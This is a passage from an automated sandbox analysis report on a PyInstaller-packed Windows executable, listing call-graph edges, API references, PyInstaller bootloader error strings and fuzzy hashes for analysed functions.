71725 7ff60299475c 71725->71663 71728 7ff60299473a 71727->71728 71755 7ff6029942e0 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 71727->71755 71728->71663 71730 7ff602994595 71729->71730 71731 7ff602991bf0 49 API calls 71730->71731 71732 7ff6029945e1 71731->71732 71733 7ff602991bf0 49 API calls 71732->71733 71742 7ff602994667 __vcrt_freefls 71732->71742 71735 7ff602994620 71733->71735 71734 7ff60299b5c0 _log10_special 8 API calls 71736 7ff6029946bc 71734->71736 71737 7ff602998410 2 API calls 71735->71737 71735->71742 71736->71672 71736->71673 71738 7ff60299463a 71737->71738 71739 7ff602998410 2 API calls 71738->71739 71740 7ff602994651 71739->71740 71741 7ff602998410 2 API calls 71740->71741 71741->71742 71742->71734 71743->71660 71744->71660 71745->71660 71746->71660 71747->71660 71748->71660 71749->71660 71750->71660 71751->71683 71752->71682 71753->71660 71754->71713 71755->71728 71756->71725 71757->71690 71759 7ff6029a6958 71758->71759 71762 7ff6029a6434 71759->71762 71761 7ff6029a6971 71761->71574 71763 7ff6029a644f 71762->71763 71764 7ff6029a647e 71762->71764 71773 7ff6029a9694 37 API calls 2 library calls 71763->71773 71772 7ff6029a44cc EnterCriticalSection 71764->71772 71767 7ff6029a646f 71767->71761 71768 7ff6029a6483 71769 7ff6029a64a0 38 API calls 71768->71769 71770 7ff6029a648f 71769->71770 71771 7ff6029a44d8 _fread_nolock LeaveCriticalSection 71770->71771 71771->71767 71773->71767

Control-flow Graph

[Control-flow graph, entry block at 7ff602991000; legend: Executed / Not Executed]
Strings
Memory Dump Source
• Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: FileModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
• API String ID: 514040917-585287483
• Opcode ID: 8dd58cd97c405040a77db062d9acfda8e08e8378b8cbaa13dcca7cc5a35637ec
• Instruction ID: 3e3a978948b26bc0310a5d795479d52a3854b72f0760146adda1935af088f458
• Opcode Fuzzy Hash: 8dd58cd97c405040a77db062d9acfda8e08e8378b8cbaa13dcca7cc5a35637ec
• Instruction Fuzzy Hash: 99F19021A08782A9FB19DB2BD5542F96B51FF447A8FA04032DA5DC32D7EFACE564C340

Control-flow Graph

[Control-flow graph, entry block at 7ff6029b4a80; legend: Executed / Not Executed]
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4AC5
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: HeapFree.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A9780: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A9789
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A9780: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A97AE
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4AB4
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                                            • Opcode ID: e105f9a5308570b1920b5885f7f78e0c7fe7403fb772c3fbd1fdeeb615f7f833
                                                                                                                                                                                                                            • Instruction ID: 9ccd91559210efa3a427553eb2847510f54a8642867b88858184a780e28a8a21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e105f9a5308570b1920b5885f7f78e0c7fe7403fb772c3fbd1fdeeb615f7f833
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74D1F326E1821246EB21DF27D6601B96BA1FF84B8CF606035EA4DC7A87DFBCE441D340

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                            • Opcode ID: efb19b9bc7d9a7af770bbfb887b0b9fb968e3759c068f8a030e5a107204cb42c
                                                                                                                                                                                                                            • Instruction ID: b1ed138aefb6c3d9f2fc5af3cc7eabdc426ba25096205da525745fdffaa3e594
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb19b9bc7d9a7af770bbfb887b0b9fb968e3759c068f8a030e5a107204cb42c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBC1E032B28A4186EB11CFA6C5806AC3B61FB49B9CF611239DE1E973D6CF78D455C340

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4448: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B445C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: HeapFree.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                                            • Opcode ID: 303ac4e173d60c1653361034bfd680bd54c6db46ca9fd4eee2ed4abd6d663136
                                                                                                                                                                                                                            • Instruction ID: 1a3fba4cc495798e34acbb1d96239d576753923b1c089756c9e9a044fd92d29a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 303ac4e173d60c1653361034bfd680bd54c6db46ca9fd4eee2ed4abd6d663136
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD51A132A1864286E711DF27EA911B97B60FF8878CF606135EA4DC7697DFBCE4019740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                            • Opcode ID: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction ID: 0eec0533ce7a8f831826c8006c1060744d8332ddbf30b9b71040a25de4d18897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF0C862A1C7418BF7A08B69B48A76A7790FF8473CF140339DA6D426D5DF7CD059CA00

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                            • String ID: FlsFree$FlsGetValue$FlsSetValue
                                                                                                                                                                                                                            • API String ID: 1452528299-2999854541
                                                                                                                                                                                                                            • Opcode ID: c174eb66c9072d115f7b4b635c95bafa6c749e74807dc21d99819295e1953926
                                                                                                                                                                                                                            • Instruction ID: b7f6d351354218459d9df42a2795fcb0e2d7e39d146dac0f9d07e46f429efdbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c174eb66c9072d115f7b4b635c95bafa6c749e74807dc21d99819295e1953926
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA16B61A0AA039AFB05AB61A4412FC23A5FF48744F5C4036DB8E177BDEE3CE519C351

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 677216364-3497178890
                                                                                                                                                                                                                            • Opcode ID: 659f7725383b0b3d1fa0be45847f9bdbfed0c6b552e3991f9b5d536e3965ae04
                                                                                                                                                                                                                            • Instruction ID: 3bc60567fb18ec63b79c1fed2e8987e1e06e0d8f5f617e6a06a0d30bec826ce8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 659f7725383b0b3d1fa0be45847f9bdbfed0c6b552e3991f9b5d536e3965ae04
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0071E531E0868399EB20CB1ED5503B96B92FF4979CF644035E98DC7B8BEEACE5558700

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: 79e942d3b1661456f434e3b34f7cfed1355c69275aca59f60f5bdc2d1369945d
                                                                                                                                                                                                                            • Instruction ID: 05d9939a604ca1e7857d80ceffd146b9703c76f20ee8ac666096bf33306acd8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79e942d3b1661456f434e3b34f7cfed1355c69275aca59f60f5bdc2d1369945d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141B921B086434AFE219B1BA5401B96BA0FF047E8F744031DE5EC7A97EEBCE4518740

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                            • Opcode ID: c4c37e2f5b2b4efdff45cbd533f2d5aabac8a97652c0ac89e36fb261535d4a6c
                                                                                                                                                                                                                            • Instruction ID: d611e12a62c6377948f8f3a41cbef4203d4d55f44b3c84ce1bee7197b8eff2f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4c37e2f5b2b4efdff45cbd533f2d5aabac8a97652c0ac89e36fb261535d4a6c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6451E422A0864389EB209B1BA5503BA6A91FF857A8F644135ED4DC7BD7EFBCE451C700

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: f9f1d8c6891065138986491ff2aa58718a46430ac594eb4ee1f1e3f26694079b
                                                                                                                                                                                                                            • Instruction ID: f51ee67aa6c762cfbae7636ece9a8f3a904258eae2979416ddc5c1b84ab09d76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f1d8c6891065138986491ff2aa58718a46430ac594eb4ee1f1e3f26694079b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7C1BC22E0878692EB619B1694402BD3FB1EF91B98F754135DA4E87793CEFCE845C380

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF602993534), ref: 00007FF602993411
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: GetLastError.KERNEL32(?,?,?,00007FF60299342E,?,00007FF602993534), ref: 00007FF602992A14
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: FormatMessageW.KERNEL32(?,?,?,00007FF60299342E), ref: 00007FF602992A7D
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: MessageBoxW.USER32 ref: 00007FF602992ACF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                            • API String ID: 517058245-2863816727
                                                                                                                                                                                                                            • Opcode ID: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction ID: 0f5ce0ec48920a8e929dbf8d3c85f2ba0b632e84da81b70d54949d1742280080
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321B210F1854258FA21DB2AE8113BA1B50FF493ACFA00136DA5DC25D7EEACE514C304

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                            • Opcode ID: acc2441ddfc9c90ddfb51036671ee4d6f67e933df1a1bba6a91abe4f76e3936c
                                                                                                                                                                                                                            • Instruction ID: ef94e0869995d0b8848c8d20d7a2e67da1742836735180c176e8ccfe59b18c28
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acc2441ddfc9c90ddfb51036671ee4d6f67e933df1a1bba6a91abe4f76e3936c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E751E372F047118AFB14CF2AD9556BC2BA1BF5036CF604235EE5E92AE6DF78A4028740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
